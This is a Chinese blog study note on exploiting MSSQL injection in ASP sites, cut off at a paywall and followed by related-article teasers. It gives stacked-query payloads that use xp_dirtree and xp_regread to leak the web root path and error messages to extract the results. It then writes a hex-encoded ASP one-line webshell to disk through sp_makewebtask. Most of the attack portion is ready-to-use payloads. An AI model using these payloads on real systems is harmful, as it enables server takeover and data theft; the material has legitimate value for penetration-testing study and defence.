【安全牛学习笔记】MSsqlL注入取得网站路径最好的方法

最新推荐文章于 2024-08-20 18:38:45 发布
最新推荐文章于 2024-08-20 18:38:45 发布
阅读量2.4k 收藏 1
点赞数
分类专栏: 信息安全 文章标签: 测试 Security+ 信息安全 linux 漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/edu_aqniu/article/details/78409451
版权
本文介绍了利用MSsql注入获取网站路径的方法,包括利用xp_dirtree函数和xp_regread存储过程。同时,文章还探讨了Security+认证在互联网+时代为何如此火爆,指出它作为中立第三方认证,侧重于信息安全技术和操作,适合不同经验背景的IT专业人士,尤其是对网络安全感兴趣的IT运维人员,能帮助他们提升技能并拓宽职业发展道路。
摘要由CSDN通过智能技术生成

exec master..xp_dirtree'd:/test'

假设我们在test里有两个文件夹test1和test2在test1里又有test3
结果显示
subdirectory depth
test1 1
test3 2
test2 1
哈哈发现没有那个depth就是目录的级数
ok了,知道怎么办了吧
http://www.xxxxx.com/down/list.asp?id=1;create table dirs(paths varchar(1000),id int)--
http://www.xxxxx.com/down/list.asp?id=1;insert dirs exec master.dbo.xp_dirtree 'd:\' --
http://www.xxxxx.com/down/list.asp?id=1 and 0<>(select top 1 paths from dirs where id=1)-
只要加上id=1,就是第一级目录 。
通过注册表读网站路径:
1.;create table [dbo].[cyfd] ([gyfd][char](255));
2.DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE', 'SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into 临时表 (临时字段名) values(@result);--
id=2;DECLARE @result varchar(255) EXEC master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\ControlSet001\Services\W3SVC\Parameters\Virtual Roots', '/', @result output insert into cyfd (gyfd) values(@result);--
3.and 1=(select count(*) from 临时表 where 临时字段名>1)
and 1=(select count(*) from cyfd where gyfd > 1)
这样IE报错,就把刚才插进去的Web路径的值报出来了
4.drop table cyfd;-- 删除临时表
获得webshell方法:
1.create table cmd (a image)-- \**cmd是创建的临时表
2.insert into cmd (a) values (0x3C25657865637574652872657175657374282261222929253EDA)-- 往cmd表里插入一句话
3.EXECUTE sp_makewebtask @outputfile = 'WEB绝对路径\导出的文件名.asp',@query = 'SELECT image FROM cmd'
EXECUTE

最低0.47元/天 解锁文章
爱学习的小牛
关注
专栏目录
mssql 获取网站绝对路径写shell
问题很多的小明
08-13 3213
1 存在sql注入 创建表 GET /get.asp?act_id=52;create+table+gogotest+(tmp+varchar(1000));----&user_name=123 HTTP/1.1 Host: 360gongfang.com Connection: close Cache-Control: max-age=0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Macintosh; Intel M
SQL注入时快速获得WEB根目录
得峰的专栏 [网络收藏]
05-04 3476
本文章针对以下环境,如果不符合以下的条件,就不适合用下面提到的方法来获得WEB根目录。 1、SQL SERVER允许执行多行语句; 2、该网站能进行注入; 3、没有返回详细的错误提示信息(否则没有必要用这种方法)。 根据经验,猜疑WEB根目录的顺序是:d盘、e盘、c盘,首先我们建立一个临时表用于存放master..xp_dirtree(适合于public)生成的目录树,用以下语句: ;create
MSSQL手工注入
最新发布
m0_73771249的博客
08-20 450
输入' 发现报错,输入' --+ 页面正常,存在sql注入
MSsqlL注入取得网站路径最好的方法.txt
07-18
MSsqlL注入取得网站路径最好的方法
sql获取php网站路径,MSSQL_SQL Server取得网站路径的几种方法及比较,如果网站只开了80端口,你会 - phpStudy...
weixin_39834205的博客
03-19 147
SQL Server取得网站路径的几种方法及比较如果网站只开了80端口,你会发现下面的方法是比较有用的,其中用的方法几乎都不是我发现的,文总包括一些注入时的个人经验和技巧方法可以说有4种(现在已知的)第一种方法:这个是<>中介绍的方法利用sqlserver的xp_dirtree,好的我们先来将一下方法,然后再说其优劣处(在原文的基础上作了点补充)建立表语句:http://www.xxx...
小迪安全第15天 web漏洞SQL注入之Oracle,mongoDB等注入
qq_46116117的博客
12-23 2706
15 web漏洞SQL注入之Oracle,mongoDB等注入 补充: json JSON数据与常规数据的数据表达形式不同 常规注入,在a=1后直接进行测试 JSON注入,需要在JSON数据中进行测试 简要学习各种数据库的注入特点 常见数据库: Access,Mysql,mssql,mongoDB,postgresqlsqlite,oracle,sybase等 Access 表名 列名 数据 Acce
Kali linux 学习笔记(五十一)Web渗透——sqlmap自动注入 2020.3.28
闵行小鱼塘
03-28 3232
学习sqlmap自动注入
SQLmap学习笔记
weixin_43988774的博客
03-23 4356
sqlmap所有参数的学习笔记
Web安全攻防渗透测试实战指南笔记
Ren59421的博客
04-05 8033
第二章 2.1 在Linux系统中安装LANMP LANMP是Linux下Apache、Nginx、MySQL和PHP的应用环境,本节演示的是WDLinux的一款集成的安装包。 首先,下载需要的安装包,命令如下所示。 wegt http://dl.wdlinux.cn/files/lanmp_v3.tar.gz 下载完成后进行解压,解压文件的命令为tar zxvf lanmp_v3.tar.gz,运行环境如下图所示。 输入sh lanmp.sh命令运行LANMP,这时程...
mysql注入如何读取本地文件_如何通过SQL注入获取服务器本地文件
weixin_28843191的博客
01-28 590
写在前面的话SQL注入可以称得上是最臭名昭著的安全漏洞了,而SQL注入漏洞也已经给整个网络世界造成了巨大的破坏。针对SQL漏洞,研究人员也已经开发出了多种不同的利用技术来实施攻击,包括非法访问存储在远程数据库中的数据、从服务器读/写数据、以及通过MSSQL的SA账号完成任意命令执行等等。在这篇文章中,我们准备利用一个存在于文件下载函数中的SQL注入漏洞,我们将利用存在漏洞SQL语句并从远程服务器...
杂七杂八的敏感文件注释<持续更新帖>
weixin_30641999的博客
05-14 106
============敏感文件读取================ WINDOWS下: c:/boot.ini //查看系统版本 c:/windows/php.ini //php配置信息 c:/windows/my.ini //MYSQL配置文件,记录管理员登陆过的MYSQL用户名和密码 c:/winnt/php.ini c:/winnt...
SQL注入目录
weixin_34217711的博客
05-08 170
第1课:SQL注入原理深度解析 第2课:什么是SQL注入  
SQL注入详解】
一纸荒芜的博客
08-17 3801
sql注入类型与其他扩展
Mssqlsqlserver)差异备份getshell思路笔记
来到了学渣的博客
04-05 1750
差异备份的概念(百度百科): 备份自上一次完全备份之后有变化的数据。差异备份过程中,只备份有标记的那些选中的文件和文件夹。它不清除标记,也即备份后不标记为已备份文件。换言之,不清除存档属性。 差异备份getshell条件: 目标站是否存在mssql数据库注入漏洞 目标站的用户是否具备sa权限、dbo权限 找到网站的物理路径 大概思路: 假设:http://xxxxx/show.aspx?c...
SQL注入简介
kinght的博客
01-30 965
SQL全称是“结构化查询语言”,最早是IBM为关系数据库系统SYSTEMR开发的一种查询语言,SQL语言结构简洁,功能强大,简单易学,所以IBM于1981年推出后得到了广泛的应用在1998年12月的《Phack》第54期,名为rfp的黑客发表了一篇名为“NT Webs Technology Vulnerabilities”的文章,随后一种在OWASP TOP10排行榜霸榜多年名为SQL注入漏洞来到了世人的眼前原文地址:http://phrack.org/issues/54/8.html。
MySql手工注入笔记
tell_me_404的博客
02-27 279
一、基础知识 1、MySQL语句 略 2、MySQL函数 system_user() 系统用户名 user() 用户名 current_user 当前用户名 session_user() 连接数据库的用户名 database() 数据库名 version() ...
72.网络安全渗透测试—[SQL注入篇11]—[SQLSERVER+ASP-报错注入]
qwsn
01-18 3192
我认为,无论是学习安全还是从事安全的人,多多少少都有些许的情怀和使命感!!! 文章目录 一、SQLSERVER+ASP 报错注入 1、sql server的报错页面 2、SQLSERVER+ASP 报错注入示例
MSSQL 学习笔记:存储过程与日期操作
"MSSQL 学习笔记涵盖了数据库中的多个关键概念,如行列转换、数据库链接、备份操作,以及T-SQL语言的使用,包括存储过程、日期处理和跨服务器连接。" 在MSSQL学习中,了解如何有效地处理数据是非常重要的。`...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值